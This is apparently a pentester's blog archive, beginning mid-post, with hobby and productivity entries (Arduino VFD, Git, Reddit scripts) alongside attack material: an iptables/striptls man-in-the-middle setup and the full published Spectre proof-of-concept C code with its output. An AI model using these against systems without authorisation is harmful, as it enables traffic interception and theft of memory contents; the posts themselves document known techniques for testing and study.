- Create an iptables rule to redirect your target traffic to your proxy software. Here i'm redirecting all traffic over 443 to 2020 (where striptls is listening): iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-port 2020
- Download striptls from github
- Run it locally with something like: ./striptls.py -s --listen 0.0.0.0:2020 --remote exampletarget.com:443
Running striptls is obviously not mandatory since step 3 configured a working middle machine. I just used it in my testing to strip the TLS command from XMPP and HTTPS. You now have a machine all traffic is flowing through and is at your disposal to do with as you wish.
Thursday, July 12, 2018
Noritake VFD Setup
I recently got my hands on a Noritake CU24025ECPB-U1J Vacuum Florescent Display. I always enjoyed the retro 80s/90s feel of VFDs and wanted to gain some experience with with one. Below is a picture of the back for reference:
The model VFD I got comes with its own driver board so its super easy just to send it the text you want over the parallel lines and the VFD driver takes care of the rest. Lots of Noritake's models state that there is a 5 or 6 pin serial port on the driver board allowing you to use sync/async serial instead of parallel. Well I must have been the unlucky one since apparently all I have is a parallel connection (on the far right of the above image). Luckily thats no big deal because Noritake's documentation and sample files make life quite easy.
There are several parts to getting this VFD to work.
And enjoying it, I am. Noritake made it relatively easy to get up and running quite quickly, so I greatly appreciate that.
Now the next step is to modify the code so it takes input from a serial connection so I can control it using a python script. Maybe a retro twitter scroller? I dunno :D
The model VFD I got comes with its own driver board so its super easy just to send it the text you want over the parallel lines and the VFD driver takes care of the rest. Lots of Noritake's models state that there is a 5 or 6 pin serial port on the driver board allowing you to use sync/async serial instead of parallel. Well I must have been the unlucky one since apparently all I have is a parallel connection (on the far right of the above image). Luckily thats no big deal because Noritake's documentation and sample files make life quite easy.
There are several parts to getting this VFD to work.
- Hookup
- Downloading the Noritake Arduino Library
- Uploading the sample code
- Enjoying the VFD
The Hookup
Hookup was relatively easy once you found the proper documentation to tell you what the pins are.
The only thing even close to a datasheet for my exact model of VFD was off of DigiKey's website: https://media.digikey.com/pdf/Data%20Sheets/Noritake%20PDFs/CU24025ECPB-U1J.pdf
There you can see the pin layout towards the bottom of the page:
If you are using the sample code outlined later in this post, the connections for the parallel connector to the Arduino are below:
VFD -> Arduino Pin
1 (GND) > GND
2 (VCC) > VCC
3 (Not Connected)
4 (RS) > 9
5 (RW) > 10
6 (E) > 11
7 (D0) > 12 //Originally it was 0 but it causes problems with uploading the sketch, so I switched it.
8 (D1) > 13 //Originally it was 1 but it causes problems with uploading the sketch, so I switched it.
9 (D2) > 2
10 (D3) > 3
11 (D4) > 4
12 (D5) > 5
13 (D6) > 6
14 (D7) > 7
Now that you have it hooked up, double check your connections so it looks like this:
Downloading The Library
Noritake provides an Arduino library at https://www.noritake-elec.com/user/download?id=Arduino_Noritake_VFD_CUU&category=10&type=cuu
Download the Zip, add it to your Arduino Libraries by going to Sketch > Include Libraries > Add .Zip Library. Once I did that it didn't show up in the menu listing of my libraries but did show up if you clicked "Manage Libraries" as "cuu".
Uploading The Sample Code
Below is the code I used/modified to get it working for my board. I only changed the mode I was using and the pin configurations but other than that its basically the same as the sample code Noritake provides on their QuickStart guide:
#include <CUU_Interface.h> #include <CUU_Parallel_I80.h> #include <CUU_Parallel_M68.h> #include <CUU_Serial.h> #include <Noritake_VFD_CUU.h> /*VFD > Arduino 1GND > GND 2VCC > VCC 3NC 4RS > 9 5RW > 10 6E > 11 7DBO > 12 8DB1 > 13 9DB2 > 2 10DB3 > 3 11DB4 > 4 12DB5 > 5 13DB6 > 6 14DB7 > 7 */ //Changed D0, D1 from Arduino0,1 to Arduino12,13 so it will upload the sketch fine. //Apparently it cant upload if there is anything connected to 0,1 on upload :/ CUU_Parallel_M68 interface(9,10,11, 12,13,2,3,4,5,6,7);//RS,WR,RD,D0-D7 Noritake_VFD_CUU vfd; void setup() { _delay_ms(500); // wait for device to power up vfd.begin(20, 2); // 20x2 character module vfd.interface(interface); // select which interface to use vfd.CUU_init(); // initialize module vfd.print("O HAI THERE :D"); // print some text } void loop() { }
Enjoying The VFD
And enjoying it, I am. Noritake made it relatively easy to get up and running quite quickly, so I greatly appreciate that.
Now the next step is to modify the code so it takes input from a serial connection so I can control it using a python script. Maybe a retro twitter scroller? I dunno :D
References For Reference :)
Arduino QuickStart Guide: https://www.noritake-elec.com/support/design-resources/support-guide/arduino-code-library-quick-start-guide
Noritake Overview: http://www.noritake-itron.com/NewWeb/GVFD/Overview/Overview.asp
Cu-U Application Notes: https://noritake-elec.com/includes/documents/brochure/CU-U_Application_Note.pdf
Labels:
Hardware,
Just For Fun
Wednesday, May 9, 2018
A Method For Battling Procrastination
I discovered a technique that has helped me battle my own procrastination for getting tasks done. The procrastination most often happened when I had to write my pentest reports.
I found myself, often, avoiding the report and doing something else. Regardless of whatever reason I could come up with I knew it was a psychological reason I was not accomplishing this task. Rarely, if ever was there a concrete reason for holding off writing.
The trick I discovered was when I thought, "maybe I don't want to do it because it feels large and imposing. It feels like I couldn't accomplish it and so I don't even want to start". Thats when I started to break the task down...and down...and so far down that no person in the world could say "I can't do that".
So the last on my to-do list would simply say something like:
I found myself, often, avoiding the report and doing something else. Regardless of whatever reason I could come up with I knew it was a psychological reason I was not accomplishing this task. Rarely, if ever was there a concrete reason for holding off writing.
The trick I discovered was when I thought, "maybe I don't want to do it because it feels large and imposing. It feels like I couldn't accomplish it and so I don't even want to start". Thats when I started to break the task down...and down...and so far down that no person in the world could say "I can't do that".
So the last on my to-do list would simply say something like:
- Write <CLIENT> report
Anxiety/procrastination sets in, so I break it down:
- Write <CLIENT> report
- Write executive summary
- Write narrative
- Write findings
Nope, still got that procrastination, lets take it to the extreme:
- Write <CLIENT> report
- open the file
- change filename, dates and title
- Write executive summary
- summarize important findings
- etc
- Write narrative
- start with explaining pentest network position
- write recon perspective and returned ports/OSs
- start writing chronologically the attack timeline
- etc
- Write findings
- Write findings you remember from your notes
- Gather screenshots/evidence from logs
- Select the finding templates or make your own
- etc
- Send report to QA
Breaking it out this far helped my brain to feel that no matter how big this project is, all I had to do was focus on the singular next piece. No matter how much I wanted to procrastinate, I could at least open the file, I could at least change the dates.
Starting, I found, is the most important step. Motivation to complete something arises AFTER starting that something.
Good luck in life, I hope this technique can help you too.
PS.
This is a general technique, applicable to anything from pentest reports to woodwork projects to picking investments, apply liberally, rinse and repeat.
Labels:
Administrative,
Personal Development
Wednesday, April 4, 2018
Contributing to Github Projects
The following are some personal notes on the basic workflow for contributing to a project on Github.
- Visit the project's repo page (https://github.com/someguy/nice_project), click on "Fork" in the upper right corner.
- Clone your newly forked repo to your local machine
- Set an "upstream" remote so you can pull down "someguy"s code whenever you need to.
- Create a branch of the master or dev or whatever so you can start making your changes. Give it a meaningful name:
- Make your changes, add the files and make a commit:
- Push your changes to your forked repo. Typically known as the 'origin' remote:
- Log into Github and you should see a notification on your forked repo
- Click on the "Compare & pull request"
- Fill out the pull request, and then hit "Create pull request"
- Now you just wait on comments, requests, ridicule, or anything else. Once they are happy with your contributions they will "merge" your changes into their branch.
- Once its accepted you can delete that branch either through the Github website or at the CLI:
- Now you can pull down the updated upstream to see your changes in someguy's repo:
- If you'd like you can update your GH repo by pushing what you recently pulled down:
git clone https://github.com/you/nice_project
git remote set-url upstream https://github.com/someguy/nice_project
git branch bugFix-UTFencoding git checkout bugFix-UTFencoding #or all in one with: git checkout -b bugFix-UTFencoding
git add lib/some_file git commit -m 'fixed the UTF encoding errors'
git push origin bugFix-UTFencoding
git checkout master #it complains if you try to delete a branch you are on git branch -D bugFix-UTFencoding
git pull upstream master
git push origin master
Congrats on getting your pull request accepted and contributing to something. You will now feel slightly less like a leech.
Rinse and repeat lines 4-10 on the same project or the whole thing for a new project.
Bonus: If you want to pull down a specific branch from a remote upstream, you can easily do it with "git checkout -b up-master upstream/master"
Labels:
Programming
Friday, March 23, 2018
Resume Your Script After Canceling It
Several times in the past I had to write a script that iterates over a dictionary file, or brutes something on a web login or whatever. Often you like to make modifications to the script forcing you to cancel it, edit it, and start it over. The starting over part is what I hate. It took me a while to realize this (I has the dumb) but you can easily create a resume-like function in your scripts. Just use a counter!
For example your original function is something like this:
Which is your basic for loop in python, nothing new here. But lets say you ran that for a while and it outputted a couple hundred lines. You don't want to start all over again right? You need to make an edit, so you ctrl-c it, edit it, and also add in this little bit:
That's it. The "243" is just the number of times it ran and where it should start off again. So what happens here is the script begins, sees the count = 0 and doesnt run the "haxor_the_thing()" function. It won't run it until it sees a value higher than 243, thereby skipping the first 243 entries and restarting the function on the 244th entry.
If I have to cancel it again, I do a quick copy paste of the output, count lines in ST3, and just add "if count < 243 + 534:". This is obviously not the _best_ way to do this, but it sure as hell is fast.
I mean, this may seem obvious to certain people but this makes a person's life much easier.
For example your original function is something like this:
for thing in things: result = haxor_the_thing(thing) print("{} resulted in {}".format(thing,result))
Which is your basic for loop in python, nothing new here. But lets say you ran that for a while and it outputted a couple hundred lines. You don't want to start all over again right? You need to make an edit, so you ctrl-c it, edit it, and also add in this little bit:
count = 0 for thing in things: if count < 243: result = haxor_the_thing(thing) print("{} resulted in {}".format(thing,result)) count += 1
That's it. The "243" is just the number of times it ran and where it should start off again. So what happens here is the script begins, sees the count = 0 and doesnt run the "haxor_the_thing()" function. It won't run it until it sees a value higher than 243, thereby skipping the first 243 entries and restarting the function on the 244th entry.
If I have to cancel it again, I do a quick copy paste of the output, count lines in ST3, and just add "if count < 243 + 534:". This is obviously not the _best_ way to do this, but it sure as hell is fast.
I mean, this may seem obvious to certain people but this makes a person's life much easier.
Labels:
Network,
Programming,
Python
Monday, March 19, 2018
Convert IP Notation - (X.X.X.X-X.X.Y.Z -> Individual IPs)
I was provided a list of IPs and ranges, most of them were in the format of 1.1.1.1-1.1.1.4. Nmap doesnt like this format, nmap likes the format of 1.1.1.1-4. This is easy if everything is a /24. Most of my ranges were not. I used the iptools python module written for Django to parse the IPs. All I had to do was supply a file formatted properly (no spaced in between the dash) and boom, each possible IP was spit out:
Labels:
Network,
Programming,
Python
Tuesday, February 20, 2018
Reddit Watcher - Watch All Reddit Posts For Special Keyword
I was playing around last night with the Reddit API and found that it allows for streaming content to /r/all. This effectively means that every (public) submission can be parsed and played with. I decided to write a small script to check if a certain keyword is in the title of the submission.
You can do extend this in a bunch of other ways:
Once you run that with your specific OAUTH details, you'll get streaming submissions outputted to your screen:
Currently the script is only triggering if the word " I " is in the post (for testing), obviously change to your specific keyword.
You can do extend this in a bunch of other ways:
- Instead of printing to screen, send to twilio or OSX popups
- Extend the keyword checking to the content or their comments
- Restrict the catchall subreddit /r/all to something more specific like /r/netsec
- Pump the submission through sentiment analysis and graph over time to figure out if people hate you
Below is the code for the script:
#!/usr/bin/env python3 import praw keyword = " i " client_id = 'x-CLIENTIDHERE' client_secret = 'ioID-CLIENTSECRETHERE' user_agent = 'OSX:myscripthere:v1.0 (by /u/myuserhere)' reddit = praw.Reddit(client_id=client_id, client_secret=client_secret, user_agent=user_agent) for submission in reddit.subreddit('all').stream.submissions(): if keyword in submission.title.lower(): print('https://reddit.com/%s : /r/%s - %s ' % (submission.id, submission.subreddit, submission.title))
Once you run that with your specific OAUTH details, you'll get streaming submissions outputted to your screen:
Currently the script is only triggering if the word " I " is in the post (for testing), obviously change to your specific keyword.
Labels:
Just For Fun,
Programming,
Python,
Web
Friday, January 19, 2018
Remap Right Shift To Up Arrow OSX
The up arrow on the new 2017 Macbook pros are stupid small and very difficult to accurately hit. This can be extremely annoying when in a terminal and you need to hit "up" several times to go through your history.
Unfortunately there is no builtin way to modify the right shift key and map it to arbitrary keys. Fortunately, however, there is an app call "Karabiner" that grants you this functionality at an OS level. Meaning, it's not application specific.
The process is incredibly simple:
Unfortunately there is no builtin way to modify the right shift key and map it to arbitrary keys. Fortunately, however, there is an app call "Karabiner" that grants you this functionality at an OS level. Meaning, it's not application specific.
The process is incredibly simple:
- Download Karabiner
- Go to the "Simple Modifications" tab
- Click "Add Item"
- From Key: right_shift, To Key: up_arrow as seen below:
Enjoy!
Labels:
Administrative,
OSX,
Shells
Thursday, January 4, 2018
Spectre on Apple MacBook Pro Retina
I have a test machine running 10.13.2 on a MacBook Pro Retina 2017 running an Intel Core i7. The below PoC C code works when compiled with the following command:
Save the below PoC code as "spectre.c"
The original code came from the spectre paper but required a tiny patch from a gist page to work on macOS (google it and you can find it)
If you run it, this is what you should expect:
gcc -march=native -std=c11 -o spectre spectre.c; ./spectre
Save the below PoC code as "spectre.c"
#include <stdio.h> #include <stdlib.h> #include <stdint.h> #ifdef _MSC_VER #include <intrin.h> /* for rdtscp and clflush */ #pragma optimize("gt",on) #else #include <x86intrin.h> /* for rdtscp and clflush */ #endif /******************************************************************** Victim code. ********************************************************************/ unsigned int array1_size = 16; uint8_t unused1[64]; uint8_t array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 }; uint8_t unused2[64]; uint8_t array2[256 * 512]; char * secret = "The Magic Words are Squeamish Ossifrage."; uint8_t temp = 0; /* Used so compiler won’t optimize out victim_function() */ void victim_function(size_t x) { if (x < array1_size) { temp &= array2[array1[x] * 512]; } } /******************************************************************** Analysis code ********************************************************************/ #define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold */ /* Report best guess in value[0] and runner-up in value[1] */ void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2]) { static int results[256]; int tries, i, j, k, mix_i; unsigned int junk = 0; size_t training_x, x; register uint64_t time1, time2; volatile uint8_t * addr; for (i = 0; i < 256; i++) results[i] = 0; for (tries = 999; tries > 0; tries--) { /* Flush array2[256*(0..255)] from cache */ for (i = 0; i < 256; i++) _mm_clflush( & array2[i * 512]); /* intrinsic for clflush instruction */ /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */ training_x = tries % array1_size; for (j = 29; j >= 0; j--) { _mm_clflush( & array1_size); for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */ /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */ /* Avoid jumps in case those tip off the branch predictor */ x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */ x = (x | (x >> 16)); /* Set x=-1 if j&6=0, else x=0 */ x = training_x ^ (x & (malicious_x ^ training_x)); /* Call the victim! */ victim_function(x); } /* Time reads. Order is lightly mixed up to prevent stride prediction */ for (i = 0; i < 256; i++) { mix_i = ((i * 167) + 13) & 255; addr = & array2[mix_i * 512]; time1 = __rdtscp( & junk); /* READ TIMER */ junk = * addr; /* MEMORY ACCESS TO TIME */ time2 = __rdtscp( & junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */ if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size]) results[mix_i]++; /* cache hit - add +1 to score for this value */ } /* Locate highest & second-highest results results tallies in j/k */ j = k = -1; for (i = 0; i < 256; i++) { if (j < 0 || results[i] >= results[j]) { k = j; j = i; } else if (k < 0 || results[i] >= results[k]) { k = i; } } if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0)) break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */ } results[0] ^= junk; /* use junk so code above won’t get optimized out*/ value[0] = (uint8_t) j; score[0] = results[j]; value[1] = (uint8_t) k; score[1] = results[k]; } int main(int argc, const char * * argv) { size_t malicious_x = (size_t)(secret - (char * ) array1); /* default for malicious_x */ int i, score[2], len = 40; uint8_t value[2]; for (i = 0; i < sizeof(array2); i++) array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */ if (argc == 3) { sscanf(argv[1], "%p", (void * * )( & malicious_x)); malicious_x -= (size_t) array1; /* Convert input value into a pointer */ sscanf(argv[2], "%d", & len); } printf("Reading %d bytes:\n", len); while (--len >= 0) { printf("Reading at malicious_x = %p... ", (void * ) malicious_x); readMemoryByte(malicious_x++, value, score); printf("%s: ", (score[0] >= 2 * score[1] ? "Success" : "Unclear")); printf("0x%02X=’%c’ score=%d ", value[0], (value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]); if (score[1] > 0) printf("(second best: 0x%02X score=%d)", value[1], score[1]); printf("\n"); } return (0); }
The original code came from the spectre paper but required a tiny patch from a gist page to work on macOS (google it and you can find it)
If you run it, this is what you should expect:
$ gcc -march=native -std=c11 -o spectre spectre.c; ./spectre Reading 40 bytes: Reading at malicious_x = 0xfffffffffffffebe... Unclear: 0x54=’T’ score=931 (second best: 0x00 score=912) Reading at malicious_x = 0xfffffffffffffebf... Unclear: 0x68=’h’ score=974 (second best: 0x00 score=952) Reading at malicious_x = 0xfffffffffffffec0... Unclear: 0x65=’e’ score=985 (second best: 0x01 score=842) Reading at malicious_x = 0xfffffffffffffec1... Unclear: 0x20=’ ’ score=985 (second best: 0x00 score=957) Reading at malicious_x = 0xfffffffffffffec2... Unclear: 0x4D=’M’ score=994 (second best: 0x00 score=982) Reading at malicious_x = 0xfffffffffffffec3... Unclear: 0x61=’a’ score=992 (second best: 0x00 score=972) Reading at malicious_x = 0xfffffffffffffec4... Unclear: 0x67=’g’ score=997 (second best: 0x00 score=977) Reading at malicious_x = 0xfffffffffffffec5... Unclear: 0x69=’i’ score=994 (second best: 0x00 score=965) Reading at malicious_x = 0xfffffffffffffec6... Unclear: 0x63=’c’ score=989 (second best: 0x00 score=959) Reading at malicious_x = 0xfffffffffffffec7... Unclear: 0x20=’ ’ score=978 (second best: 0x00 score=961) Reading at malicious_x = 0xfffffffffffffec8... Unclear: 0x57=’W’ score=992 (second best: 0x00 score=973) Reading at malicious_x = 0xfffffffffffffec9... Unclear: 0x6F=’o’ score=992 (second best: 0x00 score=974) Reading at malicious_x = 0xfffffffffffffeca... Unclear: 0x72=’r’ score=999 (second best: 0x00 score=986) Reading at malicious_x = 0xfffffffffffffecb... Unclear: 0x64=’d’ score=988 (second best: 0x00 score=970) Reading at malicious_x = 0xfffffffffffffecc... Unclear: 0x73=’s’ score=995 (second best: 0x00 score=967) Reading at malicious_x = 0xfffffffffffffecd... Unclear: 0x20=’ ’ score=990 (second best: 0x00 score=978) Reading at malicious_x = 0xfffffffffffffece... Unclear: 0x61=’a’ score=985 (second best: 0x00 score=961) Reading at malicious_x = 0xfffffffffffffecf... Unclear: 0x72=’r’ score=998 (second best: 0x00 score=959) Reading at malicious_x = 0xfffffffffffffed0... Unclear: 0x65=’e’ score=987 (second best: 0x00 score=953) Reading at malicious_x = 0xfffffffffffffed1... Unclear: 0x20=’ ’ score=986 (second best: 0x00 score=959) Reading at malicious_x = 0xfffffffffffffed2... Unclear: 0x53=’S’ score=952 (second best: 0x00 score=925) Reading at malicious_x = 0xfffffffffffffed3... Unclear: 0x71=’q’ score=991 (second best: 0x00 score=981) Reading at malicious_x = 0xfffffffffffffed4... Unclear: 0x75=’u’ score=964 (second best: 0x00 score=948) Reading at malicious_x = 0xfffffffffffffed5... Unclear: 0x65=’e’ score=987 (second best: 0x00 score=971) Reading at malicious_x = 0xfffffffffffffed6... Unclear: 0x61=’a’ score=981 (second best: 0x00 score=936) Reading at malicious_x = 0xfffffffffffffed7... Unclear: 0x6D=’m’ score=997 (second best: 0x00 score=987) Reading at malicious_x = 0xfffffffffffffed8... Unclear: 0x69=’i’ score=997 (second best: 0x01 score=899) Reading at malicious_x = 0xfffffffffffffed9... Unclear: 0x73=’s’ score=999 (second best: 0x00 score=971) Reading at malicious_x = 0xfffffffffffffeda... Unclear: 0x68=’h’ score=997 (second best: 0x00 score=977) Reading at malicious_x = 0xfffffffffffffedb... Unclear: 0x20=’ ’ score=992 (second best: 0x00 score=979) Reading at malicious_x = 0xfffffffffffffedc... Unclear: 0x4F=’O’ score=980 (second best: 0x00 score=914) Reading at malicious_x = 0xfffffffffffffedd... Unclear: 0x73=’s’ score=994 (second best: 0x00 score=941) Reading at malicious_x = 0xfffffffffffffede... Unclear: 0x73=’s’ score=931 (second best: 0x00 score=901) Reading at malicious_x = 0xfffffffffffffedf... Unclear: 0x69=’i’ score=999 (second best: 0x00 score=980) Reading at malicious_x = 0xfffffffffffffee0... Unclear: 0x66=’f’ score=878 (second best: 0x00 score=847) Reading at malicious_x = 0xfffffffffffffee1... Unclear: 0x72=’r’ score=997 (second best: 0x00 score=949) Reading at malicious_x = 0xfffffffffffffee2... Unclear: 0x61=’a’ score=988 (second best: 0x00 score=962) Reading at malicious_x = 0xfffffffffffffee3... Unclear: 0x67=’g’ score=997 (second best: 0x00 score=951) Reading at malicious_x = 0xfffffffffffffee4... Unclear: 0x65=’e’ score=996 (second best: 0x00 score=985) Reading at malicious_x = 0xfffffffffffffee5... Unclear: 0x2E=’.’ score=989 (second best: 0x00 score=973)
Labels:
Exploit Dev,
Programming
Subscribe to:
Posts (Atom)